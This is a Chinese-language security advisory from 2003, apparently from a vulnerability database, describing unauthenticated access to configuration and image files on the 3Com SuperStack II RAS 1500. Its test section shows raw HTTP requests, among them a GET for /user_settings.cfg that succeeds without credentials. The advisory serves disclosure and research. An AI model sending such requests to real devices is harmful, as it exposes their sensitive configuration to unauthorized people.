3Com SuperStack II RAS 1500未授权远程访问漏洞
发布日期:2003-03-24
更新日期:2003-03-31
受影响系统:3Com SuperStack II RAS 1500
描述:
BUGTRAQ ID:
7176
3com SuperStack II远程访问系统1500是通过BRI-ISDN/模拟线路来访问电信设备的设备。
3com SuperStack II远程访问系统部分文件可以未授权访问,远程攻击者可以利用这个漏洞获得系统设备敏感信息。
RAS 1500只对download.htm文件(用于配置文件和系统软件的下载管理程序)进行了保护,需要HTTP BASIC方式的验证,而对系统映象文件,配置文件没有任何保护,攻击者可以未授权访问这些文件,获得敏感信息。
<*来源:Piotr Chytla (
pch@isec.pl)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104852250406896&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Piotr Chytla (
pch@isec.pl)提供了如下测试方法:
GET /download.htm HTTP/1.0
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="RAS1500"
Content-Type: text/html
Server: Allegro-Software-RomPager/2.10
GET /user_settings.cfg HTTP/1.0
HTTP/1.0 200 OK
Content-Type: multipart
Date: Mon, 25 May 1998 00:26:38 GMT
Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
Content-Length: 1258
Server: Allegro-Software-RomPager/2.10
[..]
建议:
厂商补丁:
3Com
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.3com.com浏览次数:2863
严重程度:0(网友投票)
